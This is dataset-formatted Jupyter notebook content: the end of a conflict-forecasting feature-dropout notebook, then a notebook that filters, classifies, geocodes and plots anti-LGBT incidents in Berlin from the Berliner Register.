df7[\"year_month_idx\"]+7\n\ndf1.columns = [\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb_l1\"]\ndf2.columns = [\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb_l2\"]\ndf3.columns = [\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb_l3\"]\ndf4.columns = [\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb_l4\"]\ndf5.columns = [\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb_l5\"]\ndf6.columns = [\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb_l6\"]\ndf7.columns = [\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb_l7\"]\n\ndf = pd.merge(df,df1,how=\"left\",on=[\"year_month_idx\",\"pg_id\"])\ndf = pd.merge(df,df2,how=\"left\",on=[\"year_month_idx\",\"pg_id\"])\ndf = pd.merge(df,df3,how=\"left\",on=[\"year_month_idx\",\"pg_id\"])\ndf = pd.merge(df,df4,how=\"left\",on=[\"year_month_idx\",\"pg_id\"])\ndf = pd.merge(df,df5,how=\"left\",on=[\"year_month_idx\",\"pg_id\"])\ndf = pd.merge(df,df6,how=\"left\",on=[\"year_month_idx\",\"pg_id\"])\ndf = pd.merge(df,df7,how=\"left\",on=[\"year_month_idx\",\"pg_id\"])\n\ndf[\"delta_1\"] = df[\"ln_ged_best_sb\"] - df[\"ln_ged_best_sb_l1\"]\ndf[\"delta_2\"] = df[\"ln_ged_best_sb\"] - df[\"ln_ged_best_sb_l2\"]\ndf[\"delta_3\"] = df[\"ln_ged_best_sb\"] - 
df[\"ln_ged_best_sb_l3\"]\ndf[\"delta_4\"] = df[\"ln_ged_best_sb\"] - df[\"ln_ged_best_sb_l4\"]\ndf[\"delta_5\"] = df[\"ln_ged_best_sb\"] - df[\"ln_ged_best_sb_l5\"]\ndf[\"delta_6\"] = df[\"ln_ged_best_sb\"] - df[\"ln_ged_best_sb_l6\"]\ndf[\"delta_7\"] = df[\"ln_ged_best_sb\"] - df[\"ln_ged_best_sb_l7\"]\n\ndel df1\ndel df2\ndel df3\ndel df4\ndel df5\ndel df6\ndel df7\n\ngc.collect()\n\ncols_ids = [\n \"col_idx\",\n \"row_idx\",\n \"pg_id\",\n \"year\",\n \"month\",\n \"year_idx\",\n \"month_idx\",\n \"year_month_idx\"]\n\ncols_lags = [\n \"delta_1\",\n \"delta_2\",\n \"delta_3\",\n \"delta_4\",\n \"delta_5\",\n \"delta_6\",\n \"delta_7\"\n]\n\ndf_background = df.copy()", "_____no_output_____" ], [ "for ii, median_var in enumerate(cols_feats):\n print(median_var)\n\n df = df_background.copy()\n df.loc[df[\"pg_id\"].isin(pgid_groupa + pgid_groupb),median_var] = df[median_var].median()\n\n\n subset = df[cols_feats+cols_ids]\n\n ##\n ## Fill in missing grid cells (e.g. water)\n ## \n all_cells = product(\n list(range(max(subset[\"year_month_idx\"])+1)),\n list(range(max(subset[\"col_idx\"])+1)),\n list(range(max(subset[\"row_idx\"])+1))\n )\n\n all_cells = pd.DataFrame(all_cells,\n columns=[\"year_month_idx\",\n \"col_idx\",\n \"row_idx\"])\n\n subset = pd.merge(subset, all_cells, how=\"outer\",\n on=[\"year_month_idx\",\n \"col_idx\",\n \"row_idx\"])\n\n subset[\"isnan\"] = subset[cols_feats].apply(lambda x: int(any([isnan(a) for a in x])), axis=1)\n subset.fillna(0, inplace=True)\n\n X_grouped = subset.groupby([\"year_month_idx\",\n \"col_idx\",\n \"row_idx\"])[cols_feats+[\"isnan\"]].mean()\n X_grouped.head()\n\n arr = X_grouped.values.reshape((len(X_grouped.index.unique(level=0)),\n len(X_grouped.index.unique(level=1)),\n len(X_grouped.index.unique(level=2)),\n len(cols_feats)+1))\n\n del subset\n gc.collect()\n\n X = arr[:,:,:,:]\n Y = arr[:,:,:,0]\n\n Y1 = Y[1:] - Y[0:-1]\n Y2 = Y[2:] - Y[0:-2]\n Y3 = Y[3:] - Y[0:-3]\n Y4 = Y[4:] - Y[0:-4]\n Y5 = Y[5:] - 
Y[0:-5]\n Y6 = Y[6:] - Y[0:-6]\n Y7 = Y[7:] - Y[0:-7]\n\n filler1 = np.full_like(np.zeros((1,178,169)),np.NaN)\n filler2 = np.full_like(np.zeros((2,178,169)),np.NaN)\n filler3 = np.full_like(np.zeros((3,178,169)),np.NaN)\n filler4 = np.full_like(np.zeros((4,178,169)),np.NaN)\n filler5 = np.full_like(np.zeros((5,178,169)),np.NaN)\n filler6 = np.full_like(np.zeros((6,178,169)),np.NaN)\n filler7 = np.full_like(np.zeros((7,178,169)),np.NaN)\n\n Y1 = np.concatenate((Y1, filler1), axis=0)\n Y2 = np.concatenate((Y2, filler2), axis=0)\n Y3 = np.concatenate((Y3, filler3), axis=0)\n Y4 = np.concatenate((Y4, filler4), axis=0)\n Y5 = np.concatenate((Y5, filler5), axis=0)\n Y6 = np.concatenate((Y6, filler6), axis=0)\n Y7 = np.concatenate((Y7, filler7), axis=0)\n\n YDelta = np.stack((Y1,Y2,Y3,Y4,Y5,Y6,Y7), axis=3)\n\n del Y1\n del Y2\n del Y3\n del Y4\n del Y5\n del Y6\n del Y7\n gc.collect()\n\n pred_months = 12\n\n all_preds = []\n\n for ii in range(0,X.shape[0]):\n all_preds.append( \n np.squeeze( \n model.predict( \n np.array([X[max(0,ii-pred_months+1):(ii+1)]])\n )\n )\n )\n\n gc.collect()\n\n# np.save(\"../../supplemental_data/feature_dropout/bjr_all_preds_drop_in_\"+median_var+\".npy\", all_preds)", "_____no_output_____" ], [ "for ii, median_var in enumerate(cols_feats):\n print(median_var)\n df = df_background.copy()\n\n df.loc[~df[\"pg_id\"].isin(pgid_groupa + pgid_groupb),median_var] = df[median_var].median()\n\n\n subset = df[cols_feats+cols_ids]\n\n ##\n ## Fill in missing grid cells (e.g. 
water)\n ## \n all_cells = product(\n list(range(max(subset[\"year_month_idx\"])+1)),\n list(range(max(subset[\"col_idx\"])+1)),\n list(range(max(subset[\"row_idx\"])+1))\n )\n\n all_cells = pd.DataFrame(all_cells,\n columns=[\"year_month_idx\",\n \"col_idx\",\n \"row_idx\"])\n\n subset = pd.merge(subset, all_cells, how=\"outer\",\n on=[\"year_month_idx\",\n \"col_idx\",\n \"row_idx\"])\n\n subset[\"isnan\"] = subset[cols_feats].apply(lambda x: int(any([isnan(a) for a in x])), axis=1)\n subset.fillna(0, inplace=True)\n\n X_grouped = subset.groupby([\"year_month_idx\",\n \"col_idx\",\n \"row_idx\"])[cols_feats+[\"isnan\"]].mean()\n X_grouped.head()\n\n arr = X_grouped.values.reshape((len(X_grouped.index.unique(level=0)),\n len(X_grouped.index.unique(level=1)),\n len(X_grouped.index.unique(level=2)),\n len(cols_feats)+1))\n\n del subset\n gc.collect()\n\n X = arr[:,:,:,:]\n Y = arr[:,:,:,0]\n\n Y1 = Y[1:] - Y[0:-1]\n Y2 = Y[2:] - Y[0:-2]\n Y3 = Y[3:] - Y[0:-3]\n Y4 = Y[4:] - Y[0:-4]\n Y5 = Y[5:] - Y[0:-5]\n Y6 = Y[6:] - Y[0:-6]\n Y7 = Y[7:] - Y[0:-7]\n\n filler1 = np.full_like(np.zeros((1,178,169)),np.NaN)\n filler2 = np.full_like(np.zeros((2,178,169)),np.NaN)\n filler3 = np.full_like(np.zeros((3,178,169)),np.NaN)\n filler4 = np.full_like(np.zeros((4,178,169)),np.NaN)\n filler5 = np.full_like(np.zeros((5,178,169)),np.NaN)\n filler6 = np.full_like(np.zeros((6,178,169)),np.NaN)\n filler7 = np.full_like(np.zeros((7,178,169)),np.NaN)\n\n Y1 = np.concatenate((Y1, filler1), axis=0)\n Y2 = np.concatenate((Y2, filler2), axis=0)\n Y3 = np.concatenate((Y3, filler3), axis=0)\n Y4 = np.concatenate((Y4, filler4), axis=0)\n Y5 = np.concatenate((Y5, filler5), axis=0)\n Y6 = np.concatenate((Y6, filler6), axis=0)\n Y7 = np.concatenate((Y7, filler7), axis=0)\n\n YDelta = np.stack((Y1,Y2,Y3,Y4,Y5,Y6,Y7), axis=3)\n\n del Y1\n del Y2\n del Y3\n del Y4\n del Y5\n del Y6\n del Y7\n gc.collect()\n\n pred_months = 12\n\n all_preds = []\n\n for ii in range(0,X.shape[0]):\n all_preds.append( 
\n np.squeeze( \n model.predict( \n np.array([X[max(0,ii-pred_months+1):(ii+1)]])\n )\n )\n )\n\n gc.collect()\n\n# np.save(\"../../supplemental_data/feature_dropout/bjr_all_preds_drop_out_\"+median_var+\".npy\", all_preds)", "_____no_output_____" ], [ "all_preds = np.load(\"../../supplemental_data/competition_model/competition_entry_predictions.npy\")\n\nout_df = df_background[[\"pg_id\",\"col_idx\",\"row_idx\",\"month_id\",\"year\",\"year_month_idx\",\n \"delta_1\",\"delta_2\",\"delta_3\",\"delta_4\",\"delta_5\",\"delta_6\",\"delta_7\"]].copy()\npg_col_row = df[[\"pg_id\",\"col_idx\",\"row_idx\"]].drop_duplicates()\npg_col_row = pd.concat([pg_col_row] * 7)\npg_col_row[\"month_id\"] = ([489]*10677) + ([490]*10677) + ([491]*10677) + ([492]*10677) + ([493]*10677) + ([494]*10677) + ([495]*10677)\npg_col_row[\"year_month_idx\"] = pg_col_row[\"month_id\"] - 121\n\nprint(out_df.shape)\nprint(pg_col_row.shape)\nout_df = pd.concat([out_df,pg_col_row])\nout_df.reset_index(inplace=True)\nprint(out_df.shape)\n\n\n \nfor median_var in cols_feats:\n new_preds = np.load(\"../../supplemental_data/feature_dropout/bjr_all_preds_drop_in_\"+median_var+\".npy\")\n \n# future = all_preds[-1,:,:,:]\n \n # out_df[[\"pred_l1\",\"pred_l2\",\"pred_l3\",\"pred_l4\",\"pred_l5\",\"pred_l6\"]] = None\n\n preds_l1 = [None] * out_df.shape[0]\n gc.collect()\n preds_l2 = [None] * out_df.shape[0]\n gc.collect()\n preds_l3 = [None] * out_df.shape[0]\n gc.collect()\n preds_l4 = [None] * out_df.shape[0]\n gc.collect()\n preds_l5 = [None] * out_df.shape[0]\n gc.collect()\n preds_l6 = [None] * out_df.shape[0]\n gc.collect()\n preds_l7 = [None] * out_df.shape[0]\n gc.collect()\n \n preds_l1_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l2_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l3_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l4_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l5_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l6_b = [None] * out_df.shape[0]\n 
gc.collect()\n preds_l7_b = [None] * out_df.shape[0]\n gc.collect()\n\n print(\"\\tLoop time, baby...\")\n\n jj = 0\n\n for ii, row in out_df.iterrows():\n\n if jj%1000000 == 0:\n print(f\"\\t{jj} of {out_df.shape[0]}\")\n gc.collect()\n\n col_idx = int(row[\"col_idx\"])\n row_idx = int(row[\"row_idx\"])\n year_month_idx = int(row[\"year_month_idx\"])\n\n if year_month_idx > 0:\n try:\n preds_l1[jj] = all_preds[year_month_idx-1,col_idx,row_idx,0]\n preds_l1_b[jj] = new_preds[year_month_idx-1,col_idx,row_idx,0]\n except:\n pass\n\n if year_month_idx > 1:\n try:\n preds_l2[jj] = all_preds[year_month_idx-2,col_idx,row_idx,1]\n preds_l2_b[jj] = new_preds[year_month_idx-2,col_idx,row_idx,1]\n except:\n pass\n\n if year_month_idx > 2:\n try:\n preds_l3[jj] = all_preds[year_month_idx-3,col_idx,row_idx,2]\n preds_l3_b[jj] = new_preds[year_month_idx-3,col_idx,row_idx,2]\n except:\n pass\n\n if year_month_idx > 3:\n try:\n preds_l4[jj] = all_preds[year_month_idx-4,col_idx,row_idx,3]\n preds_l4_b[jj] = new_preds[year_month_idx-4,col_idx,row_idx,3]\n except:\n pass\n\n if year_month_idx > 4:\n try:\n preds_l5[jj] = all_preds[year_month_idx-5,col_idx,row_idx,4]\n preds_l5_b[jj] = new_preds[year_month_idx-5,col_idx,row_idx,4]\n except:\n pass\n\n if year_month_idx > 5:\n try:\n preds_l6[jj] = all_preds[year_month_idx-6,col_idx,row_idx,5]\n preds_l6_b[jj] = new_preds[year_month_idx-6,col_idx,row_idx,5]\n except:\n pass\n\n if year_month_idx > 6:\n try:\n preds_l7[jj] = all_preds[year_month_idx-7,col_idx,row_idx,6]\n preds_l7_b[jj] = new_preds[year_month_idx-7,col_idx,row_idx,6]\n except:\n pass\n\n jj = jj+1\n\n out_df[\"Radford_clstm_s1\"] = preds_l1\n out_df[\"Radford_clstm_s2\"] = preds_l2\n out_df[\"Radford_clstm_s3\"] = preds_l3\n out_df[\"Radford_clstm_s4\"] = preds_l4\n out_df[\"Radford_clstm_s5\"] = preds_l5\n out_df[\"Radford_clstm_s6\"] = preds_l6\n out_df[\"Radford_clstm_s7\"] = preds_l7\n out_df[\"Radford_clstm_s1_drop_in_\"+median_var] = preds_l1_b\n 
out_df[\"Radford_clstm_s2_drop_in_\"+median_var] = preds_l2_b\n out_df[\"Radford_clstm_s3_drop_in_\"+median_var] = preds_l3_b\n out_df[\"Radford_clstm_s4_drop_in_\"+median_var] = preds_l4_b\n out_df[\"Radford_clstm_s5_drop_in_\"+median_var] = preds_l5_b\n out_df[\"Radford_clstm_s6_drop_in_\"+median_var] = preds_l6_b\n out_df[\"Radford_clstm_s7_drop_in_\"+median_var] = preds_l7_b\n \nfor median_var in cols_feats:\n new_preds = np.load(\"../../supplemental_data/feature_dropout/bjr_all_preds_drop_out_\"+median_var+\".npy\")\n \n # out_df[[\"pred_l1\",\"pred_l2\",\"pred_l3\",\"pred_l4\",\"pred_l5\",\"pred_l6\"]] = None\n\n preds_l1 = [None] * out_df.shape[0]\n gc.collect()\n preds_l2 = [None] * out_df.shape[0]\n gc.collect()\n preds_l3 = [None] * out_df.shape[0]\n gc.collect()\n preds_l4 = [None] * out_df.shape[0]\n gc.collect()\n preds_l5 = [None] * out_df.shape[0]\n gc.collect()\n preds_l6 = [None] * out_df.shape[0]\n gc.collect()\n preds_l7 = [None] * out_df.shape[0]\n gc.collect()\n \n preds_l1_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l2_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l3_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l4_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l5_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l6_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l7_b = [None] * out_df.shape[0]\n gc.collect()\n\n print(\"\\tLoop time, baby.\")\n\n jj = 0\n\n for ii, row in out_df.iterrows():\n\n if jj%1000000 == 0:\n print(f\"\\t{jj} of {out_df.shape[0]}\")\n gc.collect()\n\n col_idx = int(row[\"col_idx\"])\n row_idx = int(row[\"row_idx\"])\n year_month_idx = int(row[\"year_month_idx\"])\n\n if year_month_idx > 0:\n try:\n preds_l1[jj] = all_preds[year_month_idx-1,col_idx,row_idx,0]\n preds_l1_b[jj] = new_preds[year_month_idx-1,col_idx,row_idx,0]\n except:\n pass\n\n if year_month_idx > 1:\n try:\n preds_l2[jj] = all_preds[year_month_idx-2,col_idx,row_idx,1]\n preds_l2_b[jj] = 
new_preds[year_month_idx-2,col_idx,row_idx,1]\n except:\n pass\n\n if year_month_idx > 2:\n try:\n preds_l3[jj] = all_preds[year_month_idx-3,col_idx,row_idx,2]\n preds_l3_b[jj] = new_preds[year_month_idx-3,col_idx,row_idx,2]\n except:\n pass\n\n if year_month_idx > 3:\n try:\n preds_l4[jj] = all_preds[year_month_idx-4,col_idx,row_idx,3]\n preds_l4_b[jj] = new_preds[year_month_idx-4,col_idx,row_idx,3]\n except:\n pass\n\n if year_month_idx > 4:\n try:\n preds_l5[jj] = all_preds[year_month_idx-5,col_idx,row_idx,4]\n preds_l5_b[jj] = new_preds[year_month_idx-5,col_idx,row_idx,4]\n except:\n pass\n\n if year_month_idx > 5:\n try:\n preds_l6[jj] = all_preds[year_month_idx-6,col_idx,row_idx,5]\n preds_l6_b[jj] = new_preds[year_month_idx-6,col_idx,row_idx,5]\n except:\n pass\n\n if year_month_idx > 6:\n try:\n preds_l7[jj] = all_preds[year_month_idx-7,col_idx,row_idx,6]\n preds_l7_b[jj] = new_preds[year_month_idx-7,col_idx,row_idx,6]\n except:\n pass\n\n jj = jj+1\n\n out_df[\"Radford_clstm_s1\"] = preds_l1\n out_df[\"Radford_clstm_s2\"] = preds_l2\n out_df[\"Radford_clstm_s3\"] = preds_l3\n out_df[\"Radford_clstm_s4\"] = preds_l4\n out_df[\"Radford_clstm_s5\"] = preds_l5\n out_df[\"Radford_clstm_s6\"] = preds_l6\n out_df[\"Radford_clstm_s7\"] = preds_l7\n out_df[\"Radford_clstm_s1_drop_out_\"+median_var] = preds_l1_b\n out_df[\"Radford_clstm_s2_drop_out_\"+median_var] = preds_l2_b\n out_df[\"Radford_clstm_s3_drop_out_\"+median_var] = preds_l3_b\n out_df[\"Radford_clstm_s4_drop_out_\"+median_var] = preds_l4_b\n out_df[\"Radford_clstm_s5_drop_out_\"+median_var] = preds_l5_b\n out_df[\"Radford_clstm_s6_drop_out_\"+median_var] = preds_l6_b\n out_df[\"Radford_clstm_s7_drop_out_\"+median_var] = preds_l7_b\n \n# out_df.to_csv(\"../../data/competition_model/feature_dropout/bjr_all_preds_drop.csv\", index=False)\n \n", "_____no_output_____" ] ] ]
[ "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code", "code" ] ]
e731147d9d44bf3e31abbd58c06b2e6dad40e9fa
643,239
ipynb
Jupyter Notebook
final_project/Berliner_Register.ipynb
fserro/LGBT-violence-Berlin
0f11bed6d16f7ced5d8834ff9ef1b85b97490423
[ "MIT" ]
2
2021-12-18T10:11:52.000Z
2022-02-28T10:55:41.000Z
final_project/Berliner_Register.ipynb
fserro/LGBT-violence-Berlin
0f11bed6d16f7ced5d8834ff9ef1b85b97490423
[ "MIT" ]
1
2021-11-11T16:56:58.000Z
2021-11-15T09:00:16.000Z
final_project/Berliner_Register.ipynb
fserro/LGBT-violence-Berlin
0f11bed6d16f7ced5d8834ff9ef1b85b97490423
[ "MIT" ]
1
2021-11-11T15:42:35.000Z
2021-11-11T15:42:35.000Z
161.861852
202,580
0.840234
[ [ [ "import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport sys\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom langdetect import detect, detect_langs", "_____no_output_____" ] ], [ [ "Decisions:\n* Will just consider data form 2014 to 2021 because before that only a few districts were reporting\n\n**TO DO**\n* find coordinates\n * if cannot find locations, find random coordinates in the mentioned district\n* categorize incidents:\n * attack\n (against individuals)\n * physical (or physical + verbal)\n * verbal\n * propaganda\n (against community)\n * stickers, graffiti, banners\n * speeches by individuals and members of political parties (incl. in the municipal assemblies BVV)\n * public expressions (oral and written) in media and online\n * damaging of property\n * graffiti, damaging of lgbt symbols, memorials, plaques...\n * structural discrimination\n * in workplace or public/private institutions\n * reported status to police\n * yes or no\n\n**TO DO: MISC**\n* there are four incidents without a story. Indices: [2063, 2261, 2350, 4310, 4469]\n* add button to toggle language between DE and EN\n* check if I can loop through found entities in doc and determine whether they are in the listed district\n* terms to filter out attacks: Angriff, Attack, Aggression\n * check if I should search for lemmas instead. Do Angriff and angreifen have the same lemma?\n *I think not. 
So I should search for lemmas: Angriff, angreiffen, Attack, attackieren, Aggression, anschlagen, geschlagen\n* desambiguate addresses when coordinates are the same \n\nFalsely tagged LGBT-fobic:\n11687, 11773, 17192\n ", "_____no_output_____" ], [ "# Load pickled berlin_streets_dict", "_____no_output_____" ] ], [ [ "with open('../berlin_streets_dict.pickle', 'rb') as f:\n berlin_streets_dics = pickle.load(f)", "_____no_output_____" ], [ "len(berlin_streets_dics['Straße'])", "_____no_output_____" ] ], [ [ "# Load pickled df_complete", "_____no_output_____" ] ], [ [ "with open('pickles/df_complete.pickle', 'rb') as f:\n df_complete = pickle.load(f)", "_____no_output_____" ], [ "df_complete.loc[11041]['Story']", "_____no_output_____" ] ], [ [ "# Load pickled df_lgbt", "_____no_output_____" ] ], [ [ "with open('df_lgbt.pickle', 'rb') as f:\n df_lgbt = pickle.load(f)", "_____no_output_____" ], [ "df_complete", "_____no_output_____" ] ], [ [ "# Select df", "_____no_output_____" ] ], [ [ "# Only cases between 2014 and 2021\ndf_2014_2021 = df_complete[df_complete['Date'].dt.year >= 2014][['Date', 'District', 'Header', 'Story', 'Source']]\ndf_2014_2021.shape", "_____no_output_____" ], [ "# only cases that mention violence against LGBTQI* people in header OR in story\nlgbt_lexicon = 'heteronormativ|gay|lgbt|lgtb|lbgt|ltgb|lgbqt|schwul|schwuchtel|lsbt|transgender|'\\\n'transphob|transsex|transfrau|transperson|transmann|transfeind|homophob|queer|gleichgeschlecht|'\\\n'homosexu|homofeindlich|sexuelle[rn]* [ovi]|[^a-zöäüß]gender|binär'\n\ndf_lgbt = df_2014_2021[(df_2014_2021['Story'].str.contains(lgbt_lexicon, flags=re.IGNORECASE) == True)|(df_2014_2021['Header'].str.contains(lgbt_lexicon, flags=re.IGNORECASE) == True)]", "_____no_output_____" ], [ "# lenght of DataFrame and TODO number of characters to translate afterwards\nlen(df_lgbt), df_lgbt['Story'].str.len().sum(), df_lgbt['Header'].str.len().sum()", "_____no_output_____" ], [ "lgbt_indices = df_lgbt.index", 
"_____no_output_____" ], [ "# Test for LGBT words\ntest_term = 'binär'\ntest_indices = df_2014_2021[(df_2014_2021['Story'].str.contains(test_term, flags=re.IGNORECASE) == True)|(df_2014_2021['Header'].str.contains(test_term, flags=re.IGNORECASE) == True)].index\na=np.array([x for x in np.array(test_indices) if x not in np.array(lgbt_indices)])\na\n#geschlechterbild -konzept #binären", "_____no_output_____" ], [ "df_2014_2021.loc[a]['Header']\n", "_____no_output_____" ], [ "df_2014_2021.loc[17610]['Story']\n", "_____no_output_____" ] ], [ [ "### Fill missing values", "_____no_output_____" ] ], [ [ "df_lgbt[df_lgbt['District'].isna() == True]", "_____no_output_____" ], [ "df_lgbt[df_lgbt['District'].isna() == True]\n# df_lgbt['District'].loc[4512] = 'Charlottenburg-Wilmersdorf'\n# df_lgbt['District'].loc[2421] = 'Mitte'", "_____no_output_____" ], [ "# pickle df_lgbt\nwith open('df_lgbt.pickle', 'wb') as f:\n pickle.dump(df_lgbt, f)", "_____no_output_____" ] ], [ [ "# Add classifiers", "_____no_output_____" ] ], [ [ "# Add columns with np.nan\ndf_lgbt['Reported status'] = [np.nan for x in range(len(df_lgbt))]", "<ipython-input-587-39245ea6712c>:1: SettingWithCopyWarning: \nA value is trying to be set on a copy of a slice from a DataFrame.\nTry using .loc[row_indexer,col_indexer] = value instead\n\nSee the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n df_lgbt['Reported status'] = [np.nan for x in range(len(df_lgbt))]\n" ] ], [ [ "**Physical Attack**", "_____no_output_____" ] ], [ [ "filter_words = 'angriff|attack'\ndf_physical_attacks = df_lgbt[(df_lgbt['Header'].str.contains(filter_words, flags=re.IGNORECASE) == True)|(df_lgbt['Story'].str.contains(filter_words, flags=re.IGNORECASE) == True)]", "_____no_output_____" ], [ "physical_attack_indices = df_physical_attacks.index\nphysical_attack_indices", "_____no_output_____" ], [ "for i in attack_indices:\n df_lgbt.loc[i, 'Attack'] = 
'physical'", "/opt/anaconda3/lib/python3.8/site-packages/pandas/core/indexing.py:1765: SettingWithCopyWarning: \nA value is trying to be set on a copy of a slice from a DataFrame.\nTry using .loc[row_indexer,col_indexer] = value instead\n\nSee the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n isetter(loc, value)\n" ] ], [ [ "**Verbal Attack**", "_____no_output_____" ] ], [ [ "df_without_physical_attacks = (df_lgbt[df_lgbt['Attack'].isna() == True])", "_____no_output_____" ], [ "filter_words = 'beleidig|beschimpf|bedroh'\ndf_verbal_attacks = df_without_physical_attacks[(df_without_physical_attacks['Header'].str.contains(filter_words, flags=re.IGNORECASE) == True)|(df_without_physical_attacks['Story'].str.contains(filter_words, flags=re.IGNORECASE) == True)]", "_____no_output_____" ], [ "# get indices\nverbal_attack_indices = df_verbal_attacks.index\nverbal_attack_indices", "_____no_output_____" ], [ "for i in verbal_attack_indices:\n df_lgbt.loc[i, 'Attack'] = 'verbal'", "/opt/anaconda3/lib/python3.8/site-packages/pandas/core/indexing.py:1765: SettingWithCopyWarning: \nA value is trying to be set on a copy of a slice from a DataFrame.\nTry using .loc[row_indexer,col_indexer] = value instead\n\nSee the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n isetter(loc, value)\n" ], [ "df_lgbt_test = df_lgbt[['Date', 'District', 'Header', 'Story', 'Source', 'Attack']]\ndf_lgbt_attacks = df_lgbt_test.dropna()", "_____no_output_____" ], [ "# pickle df_lgbt_attacks\nwith open('df_lgbt_attacks.pickle', 'wb') as f:\n pickle.dump(df_lgbt_attacks, f)", "_____no_output_____" ] ], [ [ "### Add coordinates", "_____no_output_____" ] ], [ [ "from geopy.geocoders import Nominatim", "_____no_output_____" ], [ "loc = Nominatim(user_agent=\"mymap\").geocode(\"europacenter\")\nloc.address", "_____no_output_____" ], [ 
"coord = loc.latitude, loc.longitude\ncoord", "_____no_output_____" ], [ "df_2014_2021_attacks[df_2014_2021_attacks['Story'].str.contains(lgbt_lexicon, flags=re.IGNORECASE) == True]\n", "_____no_output_____" ], [ "df_2020_monthly_district = df_2020.groupby(['District', df_complete['Date'].dt.month])[['Header']].count().unstack('District')", "_____no_output_____" ], [ "df_2020_monthly_district", "_____no_output_____" ], [ "df_2020_monthly_district.plot(figsize=(20,8), kind='bar', xlabel='month', ylabel='reported cases')", "_____no_output_____" ], [ "df_2014_2021 = df_complete[df_complete['Date'].dt.year >= 2014][['Date', 'District', 'Header', 'Source']]", "_____no_output_____" ], [ "df_2014_2021_yearly_district = df_2014_2021.groupby(['District', df_complete['Date'].dt.year])[['Header']].count().unstack('District')\ndf_2014_2021_yearly_district\n", "_____no_output_____" ], [ "df_2014_2021_yearly_district.plot(figsize=(20,8), kind='bar', xlabel='year', ylabel='reported cases')", "_____no_output_____" ], [ "df_attacks_2014_2021 = df_2014_2021[df_2014_2021['Header'].str.contains('angriff|attack|beleidig|beschimpf|bedroh', flags=re.IGNORECASE) == True]\n", "_____no_output_____" ], [ "df_attacks_2014_2021", "_____no_output_____" ], [ "df_attacks_2014_2021_yearly_district = df_attacks_2014_2021.groupby(['District', df_complete['Date'].dt.year])[['Header']].count().unstack('District')\ndf_attacks_2014_2021_yearly_district\n", "_____no_output_____" ], [ "df_attacks_2014_2021_yearly_district.plot(figsize=(20,8), kind='area', xlabel='year', ylabel='reported cases')", "_____no_output_____" ], [ "df_attacks_2014_2021_monthly_district = df_attacks_2014_2021.groupby(['District', df_complete['Date'].dt.month])[['Header']].count().unstack('District')\ndf_attacks_2014_2021_monthly_district\n", "_____no_output_____" ], [ "df_attacks_2014_2021_monthly_district.plot(figsize=(20,8), kind='area', xlabel='month', ylabel='reported cases')", "_____no_output_____" ], [ "df_2014_2021 = 
df_complete[df_complete['Date'].dt.year >= 2014][['Date', 'District', 'Header', 'Source', 'Story']]", "_____no_output_____" ], [ "df_2014_2021_attacks = df_2014_2021[df_2014_2021['Header'].str.contains('angriff|attack|beleidig|beschimpf', flags=re.IGNORECASE) == True]", "_____no_output_____" ], [ "df_2014_2021_attacks.shape", "_____no_output_____" ], [ "df_2014_2021_lgbt_attacks = df_2014_2021_attacks[df_2014_2021_attacks['Story'].str.contains('gay|lgbt|lgtb|schwul|lsbt|transphob|transsex|transfrau|transmann|transfeindlich|homophob|gleichgeschlecht', flags=re.IGNORECASE) == True]\n", "_____no_output_____" ], [ "df_2014_2021_lgbt_attacks.shape", "_____no_output_____" ], [ "df_2014_2021.loc[20746]['Story']", "_____no_output_____" ], [ "df_2014_2021[df_2014_2021['Date'] == \"2021-05-29\"]", "_____no_output_____" ], [ "df_2014_2021_lgbt_attacks.shape", "_____no_output_____" ] ], [ [ "### Add District (Mitte) to missing value index= 2421", "_____no_output_____" ] ], [ [ "df_2014_2021_lgbt_attacks[df_2014_2021_lgbt_attacks['District'].isna() == True]['Story'].iloc[0]", "_____no_output_____" ], [ "df_2014_2021_lgbt_attacks[df_2014_2021_lgbt_attacks['District'].isna() == True]", "_____no_output_____" ], [ "df_2014_2021_lgbt_attacks.loc[2421, 'District'] = 'Mitte'", "/opt/anaconda3/lib/python3.8/site-packages/pandas/core/indexing.py:1765: SettingWithCopyWarning: \nA value is trying to be set on a copy of a slice from a DataFrame.\nTry using .loc[row_indexer,col_indexer] = value instead\n\nSee the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n isetter(loc, value)\n" ], [ "df_2014_2021_lgbt_attacks.loc[2421]", "_____no_output_____" ], [ "df_2014_2021_lgbt_attacks.iloc[-100:-50]", "_____no_output_____" ], [ "df_2014_2021_lgbt_attacks.iloc[-3]['Story']", "_____no_output_____" ], [ "# Olympia & Cheryl attach\ndf_2014_2021_lgbt_attacks[df_2014_2021_lgbt_attacks['District'] == 
